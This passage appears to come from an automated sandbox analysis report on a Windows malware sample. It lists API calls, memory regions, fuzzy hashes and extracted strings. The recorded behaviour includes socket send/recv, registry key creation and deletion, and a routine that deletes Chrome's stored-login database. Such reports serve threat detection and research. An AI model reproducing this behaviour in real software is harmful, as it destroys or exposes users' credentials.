                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                • Opcode ID: 15dc846c36ebc9c0ce37a4b9654632d06cb3db7373f8159deadff038a23b74ff
                                                                                                                                                                • Instruction ID: 80bc8165f0e57a9160a646999def507a2488367e2ddf88c4dce48704c6b60856
                                                                                                                                                                • Opcode Fuzzy Hash: 15dc846c36ebc9c0ce37a4b9654632d06cb3db7373f8159deadff038a23b74ff
                                                                                                                                                                • Instruction Fuzzy Hash: 4FD0C974200309AF9E149F69E845D7B3BADBB8AA64710851AF82C97741EF31F8208961
                                                                                                                                                                APIs
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,0006DB60,?,00000000,00000000), ref: 0006DB53
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                • Opcode ID: 59c8be7bfed44f1587fea76122684b7fff751c5b6797f48bc8ccdb004f5f8bdf
                                                                                                                                                                • Instruction ID: 0aba1a236ba22eeb846644f0e260a1d916452c8df6ee608049292362f2901389
                                                                                                                                                                • Opcode Fuzzy Hash: 59c8be7bfed44f1587fea76122684b7fff751c5b6797f48bc8ccdb004f5f8bdf
                                                                                                                                                                • Instruction Fuzzy Hash: 6BD012B6B50248BEBB005BB2AC08DBB779EDB24210B01C422BD08CA000D63AE8208A64
                                                                                                                                                                APIs
                                                                                                                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 000649F5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Startup
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 724789610-0
                                                                                                                                                                • Opcode ID: a58bb98ee19ded148a4ec3c37e206011e9988389ae737f8392be25494607f29f
                                                                                                                                                                • Instruction ID: f9cdb5e634ce0572dcb601ea0da60a39ee3bc822bdfc970e40b44b66d97d4c0d
                                                                                                                                                                • Opcode Fuzzy Hash: a58bb98ee19ded148a4ec3c37e206011e9988389ae737f8392be25494607f29f
                                                                                                                                                                • Instruction Fuzzy Hash: C8D0C9725586084EF611AAB4AC0BCB4B76C8312615F0003AA68A5835D2E649161882A7
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Deallocate.LIBCONCRT ref: 00062ECB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Deallocatestd::_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1323251999-0
                                                                                                                                                                • Opcode ID: 96dd3169ced21f31ec5b18273d46f1e500e6461f832ab0249736071218e75d5f
                                                                                                                                                                • Instruction ID: da25d01981296eb2d94dcd124fe1c8d54705f1a5d273a3aa68ce671bf1263eda
                                                                                                                                                                • Opcode Fuzzy Hash: 96dd3169ced21f31ec5b18273d46f1e500e6461f832ab0249736071218e75d5f
                                                                                                                                                                • Instruction Fuzzy Hash: 74C08C3264420C73CA0039C2EC02EBA7B8F9B10760F048021FA0808162E5A3A570A6E5
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: recv
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1507349165-0
                                                                                                                                                                • Opcode ID: ba6927ad14d34a558c084fe5c41046b697c060644f4361a00436da719c9e3f22
                                                                                                                                                                • Instruction ID: 247e7ae1d2e5694ca2299255979632c89ee2ff35bee29f7cc8774be7295d66c6
                                                                                                                                                                • Opcode Fuzzy Hash: ba6927ad14d34a558c084fe5c41046b697c060644f4361a00436da719c9e3f22
                                                                                                                                                                • Instruction Fuzzy Hash: D6C04C75108608BF9F151B91DC04CBD3B6AD7456607008154B90545110D637955096A0
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: send
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2809346765-0
                                                                                                                                                                • Opcode ID: c2d90cb18fc864b5b3e71a7c7a53bba2861f42d1184215ebcdf3e2828ce3def7
                                                                                                                                                                • Instruction ID: b01c11f10dfbd984752056a1d10a1a2b8845bc04bcfc012080b3231e7afe7e23
                                                                                                                                                                • Opcode Fuzzy Hash: c2d90cb18fc864b5b3e71a7c7a53bba2861f42d1184215ebcdf3e2828ce3def7
                                                                                                                                                                • Instruction Fuzzy Hash: F9C09B7610850CFF9F151FA1DC04CBD3FBED744760B008614F90545111D737D9109790
                                                                                                                                                                APIs
                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,6FE66A1E), ref: 6FE67826
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                                                • Opcode ID: 0087b3f8a92e87a5ac3989b1041aa6761189982caad8e9442f4dac9e37003157
                                                                                                                                                                • Instruction ID: 1461dc88228c1fc2e3c7166e799889e71676ccde0b17d07de96b85b175bd1170
                                                                                                                                                                • Opcode Fuzzy Hash: 0087b3f8a92e87a5ac3989b1041aa6761189982caad8e9442f4dac9e37003157
                                                                                                                                                                • Instruction Fuzzy Hash: 9BC0027C805A048FCB00AF24E59A4497FE5BB47215F80452AD9D9C2640E6349978CA92
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                • Opcode ID: e0f249b2bd79e6dc4f6b8d523ac5ada3fca64fe8493ba016cfd398eed68ea2a6
                                                                                                                                                                • Instruction ID: dbd3a458d2ffe3b4f4ddfa71bf71f457958e8a906b071e4e9b2f6abb57b4cdbf
                                                                                                                                                                • Opcode Fuzzy Hash: e0f249b2bd79e6dc4f6b8d523ac5ada3fca64fe8493ba016cfd398eed68ea2a6
                                                                                                                                                                • Instruction Fuzzy Hash: A17102B4500B448BD731CF29C980B52BBF1BF49718F608A1EE9DA8BA81DB75F449CB51
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,02550019), ref: 0255060B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000040,00003000,00000000,?,?,00070905,?,00000000,00003000,00000040,00000000), ref: 000707CF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
• Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                APIs
                                                                                                                                                                • CloseHandle.KERNEL32(?,6FE4699D,?,6FE4689D,?,6FE468AD,?,6FE468F8), ref: 6FE4753A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
• Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcess.KERNEL32(6FEA6AC4,?,?,?,?,6FEA6AC4,6FEADDE0), ref: 6FE7FB47
                                                                                                                                                                • GetProcAddress.KERNEL32(SymAddrIncludeInlineTrace), ref: 6FE7FB83
                                                                                                                                                                • GetProcAddress.KERNEL32(SymQueryInlineTrace), ref: 6FE7FBCB
                                                                                                                                                                • GetProcAddress.KERNEL32(SymFromInlineContextW), ref: 6FE7FCC2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
• Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$CurrentProcess
                                                                                                                                                                • String ID: SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymQueryInlineTrace$X
                                                                                                                                                                • API String ID: 2190909847-1953985048
                                                                                                                                                                APIs
                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,000D22A0,000D22B8,pth_unenc), ref: 0007A4FE
                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0007A535
                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0007A5AF
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0007A5DD
                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0007A5E6
                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 0007A603
                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 0007A610
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0007A638
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0007A64B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
• Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                • String ID: pth_unenc
                                                                                                                                                                • API String ID: 2341273852-4028850238
                                                                                                                                                                APIs
                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 6FE7EADF
                                                                                                                                                                • GetFullPathNameW.KERNEL32(?,00000200,CAFFFB54,00000000), ref: 6FE7EAEC
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE7EAFD
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE7EB16
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
• Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$FullNamePath
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$\\?\\\?\UNC\$uo&$uo&
                                                                                                                                                                • API String ID: 2482867836-1997178444
                                                                                                                                                                APIs
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00001000,?,00001000), ref: 6FE7D1EC
                                                                                                                                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,00000000), ref: 6FE7D21C
                                                                                                                                                                • WriteConsoleW.KERNEL32(?,?,00000001,6FE7CFF7,00000000), ref: 6FE7D26D
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE7D483
                                                                                                                                                                Strings
                                                                                                                                                                • 8o, xrefs: 6FE7D4F9, 6FE7D502
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6FE7D4E9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
• Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ConsoleWrite$ByteCharErrorLastMultiWide
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$8o
                                                                                                                                                                • API String ID: 3036337926-1020289318
                                                                                                                                                                • Opcode ID: 4a08d1f98112b0dc7e2ee7231b65629e2e5d7d8471de64969ed0f28b4d662633
                                                                                                                                                                • Instruction ID: b1abcd18a74866846b2254a4e2e2b63d35bdf17b8f471b46997e64a2d5b7e599
                                                                                                                                                                • Opcode Fuzzy Hash: 4a08d1f98112b0dc7e2ee7231b65629e2e5d7d8471de64969ed0f28b4d662633
                                                                                                                                                                • Instruction Fuzzy Hash: C29159359297825AE7228B3DC84276AFF95AFD3394F24D72BF99036191FB31D1818305
                                                                                                                                                                APIs
                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 000723AE
                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 000723BA
                                                                                                                                                                  • Part of subcall function 00064BE3: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00064C56
                                                                                                                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0007258A
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00072591
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                                                • API String ID: 2127411465-314212984
                                                                                                                                                                • Opcode ID: 61fa17b2d2ebe33f079f1c6e5e2ab5eca18e538356748098a639a77e926823f5
                                                                                                                                                                • Instruction ID: 5f704ee2020ac9c3207f6a1e7e717773356925a9caa93beb4228b41639f69ac9
                                                                                                                                                                • Opcode Fuzzy Hash: 61fa17b2d2ebe33f079f1c6e5e2ab5eca18e538356748098a639a77e926823f5
                                                                                                                                                                • Instruction Fuzzy Hash: C6C1D571A0830067CA18FB74CC97DEE77AAAFA1700F44452DF946971D7EE699A08C392
                                                                                                                                                                APIs
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data,00000000), ref: 0006B606
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0006B610
                                                                                                                                                                Strings
                                                                                                                                                                • UserProfile, xrefs: 0006B5D6
                                                                                                                                                                • [Chrome StoredLogins found, cleared!], xrefs: 0006B636
                                                                                                                                                                • [Chrome StoredLogins not found], xrefs: 0006B62A
                                                                                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0006B5D1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteErrorFileLast
                                                                                                                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                                                • API String ID: 2018770650-1062637481
                                                                                                                                                                • Opcode ID: 048c9789249a44ac6850030868948b8978d430d54d5ff894f2f51bb62010d6d0
                                                                                                                                                                • Instruction ID: 15d70329a273a8c83529c9949d3e7d7b755c5530d87c8f2427c67c2ed065ec77
                                                                                                                                                                • Opcode Fuzzy Hash: 048c9789249a44ac6850030868948b8978d430d54d5ff894f2f51bb62010d6d0
                                                                                                                                                                • Instruction Fuzzy Hash: FD01D1B1A844085BAA18BB74DC179FE7BAAAF21301B401119F50297193EF564948C6D2
                                                                                                                                                                APIs
                                                                                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,000AF3AF,?,00000000), ref: 000AF129
                                                                                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,000AF3AF,?,00000000), ref: 000AF152
                                                                                                                                                                • GetACP.KERNEL32(?,?,000AF3AF,?,00000000), ref: 000AF167
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                                                                • Opcode ID: fe1296cb608636f0d82e3a11850c20b0147e1813ff4eaf1ae22df143c89f51e7
                                                                                                                                                                • Instruction ID: 1994f5782aa24c479fbdf2f8f926f49ed0c4bcafdfbb90abad87d09412833fab
                                                                                                                                                                • Opcode Fuzzy Hash: fe1296cb608636f0d82e3a11850c20b0147e1813ff4eaf1ae22df143c89f51e7
                                                                                                                                                                • Instruction Fuzzy Hash: 7F218362740106EAEBB58FD4C901EF7B3E6EB56F60B568574E909D7205E732DD40C390
                                                                                                                                                                APIs
                                                                                                                                                                • __EH_prolog.LIBCMT ref: 000691A3
                                                                                                                                                                  • Part of subcall function 00068BCD: char_traits.LIBCPMT ref: 00068BE8
